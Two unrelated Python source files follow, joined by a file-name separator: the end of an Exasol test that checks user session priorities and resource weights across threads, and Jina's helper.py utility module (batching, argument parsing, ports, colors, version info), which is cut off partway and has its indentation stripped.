self.query('CREATE TABLE t1 (name VARCHAR(10), nr INTEGER PRIMARY KEY)')
self.query("""INSERT INTO t1 VALUES ('u0', 0), ('u1', 1), ('u2', 2), ('u3', 3), ('u4', 4), ('u5', 5), ('u6', 6), ('u7', 7), ('u8', 8), ('u9', 9), ('u10', 10), ('u11', 11), ('u12', 12), ('u13', 13), ('u14', 14), ('u15', 15), ('u16', 16), ('u17', 17), ('u18', 18), ('u19', 19), ('u20', 20)""")
self.commit()
# create users with default priority MEDIUM
self.createUser('U1', "u1")
self.createUser('U2', "u2")
def tearDown(self):
# cleanup users
self.query('DROP USER U1')
self.query('DROP USER U2')
# drop t1
self.query('OPEN SCHEMA TEST_SCHEMA')
self.query('DROP TABLE t1')
self.query('DROP SCHEMA TEST_SCHEMA')
def getConnection(self, username, password):
client = exatest.ODBCClient('exatest')
        self.log.debug('connecting to DSN "exatest" for user {username}'.format(username=username))
client.connect(uid = username, pwd = password)
return client
def createUser(self, username, password):
self.query('DROP USER IF EXISTS {username} CASCADE'.format(username=username) )
self.query('CREATE USER {username} IDENTIFIED BY "{password}"'.format(username = username, password = password))
# grant for user
self.query('GRANT CREATE SESSION TO {username}'.format(username=username))
self.query('GRANT SELECT ANY TABLE TO {username}'.format(username=username))
self.query('GRANT SELECT, DELETE, UPDATE ON TABLE t1 TO {username}'.format(username=username))
# default priority is MEDIUM
self.setPriority(username, 'MEDIUM')
self.commit()
def setPriority(self,username, priority):
self.query('GRANT PRIORITY {priority} TO {username}'.format(priority=priority, username=username))
# return dictionary with username and priority, order by username ASC
def mappedgetPriorityFromEXA_ALL_SESSIONS(self):
result = self.query("""SELECT USER_NAME, PRIORITY FROM EXA_ALL_SESSIONS""")
priorities = {}
for row in result:
priorities[row[0]] = row[1]
return priorities
# return dictionary with username and weight, order by username asc
def mappedgetWeightFromEXA_RM_PROCESS_STATES(self):
result = self.query("""SELECT USER_NAME, R.WEIGHT FROM "$EXA_SESSIONS_BASE" S, "$EXA_RM_PROCESS_STATES" R WHERE R.SESSION_ID = S.SESSION_ID""")
weights = {}
for row in result:
weights[row[0]] = row[1]
return weights
def userSessionTwoUsers(self, conn, username, queue):
# execute select on t1 for several times
conn.query('OPEN SCHEMA TEST_SCHEMA')
conn.query('ALTER SESSION SET QUERY_TIMEOUT=5')
queue.get()
conn.query('SELECT COUNT(*) from T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1')
def userSessionOneUser(self, conn, username, queue):
conn.query('OPEN SCHEMA TEST_SCHEMA')
conn.query('ALTER SESSION SET QUERY_TIMEOUT=5')
item = queue.get()
conn.query('SELECT COUNT(*) from T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1')
item = queue.get()
conn.query('SELECT COUNT(*) from T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1')
item = queue.get()
conn.query('SELECT COUNT(*) from T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1, T1')
def testPriorityTwoUsers(self):
queue1 = Queue.Queue(0)
queue2 = Queue.Queue(0)
# create connections and threads for U1 and U2
connectionu1= self.getConnection('U1', "u1")
connectionu2= self.getConnection('U2', "u2")
userThread1 = threading.Thread(target=self.userSessionTwoUsers, args = (connectionu1,"U1", queue1))
userThread2 = threading.Thread(target=self.userSessionTwoUsers, args = (connectionu2,"U2", queue2))
# start
userThread1.start()
userThread2.start()
queue1.put("item")
queue2.put("item")
# modify priority 1
self.setPriority('U2', "LOW")
self.setPriority('U1', "HIGH")
self.commit()
loopCount = 0
priorsOk = False
weightsOk = False
while True:
if(priorsOk == False):
priors = self.mappedgetPriorityFromEXA_ALL_SESSIONS()
if(weightsOk == False):
weights = self.mappedgetWeightFromEXA_RM_PROCESS_STATES()
if(loopCount > 30):
print("timeout")
break
loopCount = loopCount + 1
if(priorsOk == True and weightsOk == True):
break
else:
                if(weights.get('U1') is not None and weights.get('U2') is not None):
weightsOk = True
                if(priors.get('U1') == 'HIGH' and priors.get('U2') == 'LOW'):
priorsOk = True
if(priorsOk != True):
print("priors not yet ok: " + str(priors))
if(weightsOk != True):
print("weights not yet ok" + str(weights))
if(priorsOk != True or weightsOk != True):
time.sleep(0.1)
continue
self.assertTrue(priors.has_key('U1'))
self.assertEqual(priors['U1'], 'HIGH')
self.assertTrue(priors.has_key('U2'))
self.assertEqual(priors['U2'], 'LOW')
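        # the weights reported by the resource manager are percentages, so all
        # active sessions (U1, U2 and SYS) together should account for roughly 100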
weightsSum = weights['U1'] + weights['U2'] + weights['SYS']
        self.assertTrue(99 <= weightsSum <= 101)
# join
userThread1.join()
userThread2.join()
connectionu1.rollback()
connectionu1.close()
connectionu2.rollback()
connectionu2.close()
def testPriorityOneUser(self):
queue = Queue.Queue(0)
connectionu1= self.getConnection('U1', "u1")
userThread = threading.Thread(target=self.userSessionOneUser, args = (connectionu1,"U1", queue))
userThread.start()
# get priors and weights in Query 1
queue.put("item")
time.sleep(1)
loopCount = 0
priorsOk = False
weightsOk = False
while True:
if(priorsOk == False):
priors1 = self.mappedgetPriorityFromEXA_ALL_SESSIONS()
if(weightsOk == False):
weights1 = self.mappedgetWeightFromEXA_RM_PROCESS_STATES()
if(loopCount >= 10):
print("timeout...")
break
loopCount = loopCount + 1
if(priorsOk == True and weightsOk == True):
break
else:
                if(weights1.has_key('U1') and weights1['U1'] != None):
weightsOk = True
if(priors1.has_key('U1')):
priorsOk = True
if(priorsOk != True):
print("priors1 not yet ok: " + str(priors1))
if(weightsOk != True):
print("weights1 not yet ok: " + str(weights1))
if(priorsOk != True or weightsOk != True):
time.sleep(0.1)
continue
# assertions
self.assertTrue(priors1.has_key('U1'))
self.assertEqual(priors1['U1'], 'MEDIUM')
self.assertTrue(weights1.has_key('U1'))
weightsSum = weights1['U1'] + weights1['SYS']
        self.assertTrue(99 <= weightsSum <= 101)
# get priors and weights in Query 2 first time
queue.put("item")
loopCount = 0
priorsOk = False
weightsOk = False
while True:
if(priorsOk == False):
priors2 = self.mappedgetPriorityFromEXA_ALL_SESSIONS()
if(weightsOk == False):
weights2 = self.mappedgetWeightFromEXA_RM_PROCESS_STATES()
if(loopCount >= 10):
print("timeout...")
break
loopCount = loopCount + 1
if(priorsOk == True and weightsOk == True):
break
else:
if(weights2.has_key('U1')):
weightsOk = True
                if(priors2.get('U1') == 'MEDIUM'):
priorsOk = True
if(priorsOk != True):
print("priors2 not yet ok: " + str(priors2))
if(weightsOk != True):
print("weights2 not yet ok: " + str(weights2))
if(priorsOk != True or weightsOk != True):
time.sleep(0.1)
continue
# assertions
self.assertTrue(priors2.has_key('U1'))
self.assertEqual(priors2['U1'], 'MEDIUM')
self.assertTrue(weights2.has_key('U1'))
weightsSum = weights2['U1'] + weights2['SYS']
        self.assertTrue(99 <= weightsSum <= 101)
self.assertEqual(priors1, priors2)
self.assertEqual(weights1, weights2)
# modify priority U1
self.setPriority('U1', "LOW")
self.commit()
# get priors and weights in Query 2 second time
loopCount = 0
priorsOk = False
weightsOk = False
while True:
if(priorsOk == False):
priors3 = self.mappedgetPriorityFromEXA_ALL_SESSIONS()
if(weightsOk == False):
weights3 = self.mappedgetWeightFromEXA_RM_PROCESS_STATES()
if(loopCount >= 10):
print("timeout...")
break
loopCount = loopCount + 1
if(priorsOk == True and weightsOk == True):
break
else:
if(weights3.has_key('U1')):
weightsOk = True
                if(priors3.get('U1') == 'LOW'):
priorsOk = True
if(priorsOk != True):
print("priors3 not yet ok: " + str(priors3))
if(weightsOk != True):
print("weights3 not yet ok: " + str(weights3))
if(priorsOk != True or weightsOk != True):
time.sleep(0.1)
continue
# assertions
self.assertTrue(priors3.has_key('U1'))
self.assertEqual(priors3['U1'], 'LOW')
self.assertTrue(weights3.has_key('U1'))
weightsSum = weights3['U1'] + weights3['SYS']
        self.assertTrue(99 <= weightsSum <= 101)
self.assertNotEqual(priors2, priors3)
self.assertNotEqual(weights2, weights3)
# get priors and weights in Query 3
queue.put("item")
loopCount = 0
priorsOk = False
weightsOk = False
while True:
if(priorsOk == False):
priors4 = self.mappedgetPriorityFromEXA_ALL_SESSIONS()
if(weightsOk == False):
weights4 = self.mappedgetWeightFromEXA_RM_PROCESS_STATES()
if(loopCount >= 10):
print("timeout...")
break
loopCount = loopCount + 1
if(priorsOk == True and weightsOk == True):
break
else:
if(weights4.has_key('U1')):
weightsOk = True
                if(priors4.get('U1') == 'LOW'):
priorsOk = True
if(priorsOk != True):
print("priors4 not yet ok: " + str(priors4))
if(weightsOk != True):
print("weights4 not yet ok: " + str(weights4))
if(priorsOk != True or weightsOk != True):
time.sleep(0.1)
continue
# assertions
self.assertTrue(priors4.has_key('U1'))
self.assertEqual(priors4['U1'], 'LOW')
self.assertTrue(weights4.has_key('U1'))
weightsSum = weights4['U1'] + weights4['SYS']
        self.assertTrue(99 <= weightsSum <= 101)
self.assertEqual(priors3, priors4)
self.assertEqual(weights3, weights4)
userThread.join()
connectionu1.rollback()
connectionu1.close()
if __name__ == '__main__':
udf.main()
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
'CatchAllCleanupContextManager',
'download_mermaid_url',
'get_readable_size',
'get_or_reuse_loop',
]
def deprecated_alias(**aliases):
"""
    Usage: pass kwargs where each key is a deprecated argument name and each value is a tuple ``(new_name, deprecate_level)``.
    A deprecate_level of 0 raises a warning, a deprecate_level of 1 raises an exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
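# Illustrative usage of `deprecated_alias` (a minimal sketch, not part of this
# module; `foo` is a hypothetical function):
#
#     @deprecated_alias(input_fn=('inputs', 0))
#     def foo(inputs=None):
#         return inputs
#
#     foo(input_fn=3)  # warns that `input_fn` is renamed to `inputs`, then returns 3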
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
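# For example (the thresholds follow directly from the branches above):
#   get_readable_size(512)          -> '512 Bytes'
#   get_readable_size(2048)         -> '2.0 KB'
#   get_readable_size(3 * 1024**2)  -> '3.0 MB'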
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
while True:
chunk = tuple(islice(data, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
    if v.startswith('[') and v.endswith(']'):
        # parse a bracketed string such as '[1, 2]' into a list of parsed values
        tmp = v.replace('[', '').replace(']', '').strip().split(',')
        if len(tmp) == 1 and tmp[0] == '':
            # an empty list literal such as '[]'
            return []
        return [parse_arg(vv.strip()) for vv in tmp]
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
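# For example:
#   parse_arg('3')        -> 3
#   parse_arg('3.14')     -> 3.14
#   parse_arg('true')     -> True
#   parse_arg('"hello"')  -> 'hello'
#   parse_arg('[1, 2]')   -> [1, 2]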
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
                        # SO_REUSEADDR must be set before bind() to take effect
                        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                        s.bind(('', port))
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
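# Setting JINA_RANDOM_PORT_MIN / JINA_RANDOM_PORT_MAX narrows the range that
# `random_port` draws from, for example:
#
#   os.environ['JINA_RANDOM_PORT_MIN'] = '50000'
#   os.environ['JINA_RANDOM_PORT_MAX'] = '50100'
#   port = random_port()   # a free port in [50000, 50100]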
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
    .. note::
        A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
        to sort numbers that are close together than those distributed randomly (UUID4).
        A second, related benefit is that UUID1 can be useful in debugging, even if the origin data is lost or not
        explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
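# A minimal sketch of what `expand_dict` does (assuming the HOME environment
# variable is set; the resolved value depends on the machine):
#
#   d = {'workdir': '$HOME', 'log': '{root.workdir}/log.txt'}
#   expand_dict(d)
#   # -> {'workdir': '/home/alice', 'log': '/home/alice/log.txt'}
#
# '$HOME' is expanded via `expand_env_var`, while '{root.workdir}' is first
# resolved against the original (pre-expansion) values collected in `expand_map`
# and then expanded the same way.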
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if os.name == 'nt':
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
if self._bold:
fmt_str = '\033[1;%dm'
else:
fmt_str = '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
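    # For example:
    #   ArgNamespace.kwargs2list({'name': 'foo', 'quiet': True, 'port_in': 5555})
    #   # -> ['--name', 'foo', '--quiet', '--port-in', '5555']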
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]], parser: ArgumentParser
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
        :return: the parsed namespace
"""
args = ArgNamespace.kwargs2list(kwargs)
try:
p_args, unknown_args = parser.parse_known_args(args)
except SystemExit:
raise ValueError(
f'bad arguments "{args}" with parser {parser}, '
'you may want to double check your args '
)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
        :param args: a namespace, or a dict whose values are namespaces or lists of namespaces.
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, zmq, numpy, google.protobuf, yaml, platform
from . import (
__version__,
__proto_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'libzmq': zmq.zmq_version(),
            'pyzmq': zmq.pyzmq_version(),
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _use_uvloop():
from .importer import ImportExtensions
with ImportExtensions(
required=False,
help_text='Jina uses uvloop to manage events and sockets, '
'it often yields better performance than builtin asyncio',
):
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
if 'JINA_DISABLE_UVLOOP' not in os.environ:
_use_uvloop()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class CatchAllCleanupContextManager:
"""
    This context manager guarantees that the :meth:`__exit__` of the
    sub context is called, even when there is an exception in the
    :meth:`__enter__`.
:param sub_context: The context, that should be taken care of.
"""
def __init__(self, sub_context):
self.sub_context = sub_context
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
self.sub_context.__exit__(exc_type, exc_val, exc_tb)
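# Illustrative usage (a minimal sketch; `some_context` is a hypothetical context
# manager): guarantee that `some_context.__exit__` runs even when entering it
# raises inside the with body.
#
#   with CatchAllCleanupContextManager(some_context):
#       some_context.__enter__()
#       ...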
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
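# Illustrative usage of `cached_property` (a minimal sketch; `ExpensiveThing` and
# `load_big_file` are hypothetical):
#
#   class ExpensiveThing:
#       @cached_property
#       def data(self):
#           return load_big_file()   # runs only on first access
#
#   thing = ExpensiveThing()
#   thing.data   # computes and caches the value in thing.__dict__
#   thing.data   # returns the cached value without calling load_big_file again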
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
def get_internal_ip():
"""
Return the private IP address of the gateway for connecting from other machines in the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
Return the public IP address of the gateway for connecting from other machines in the public network.
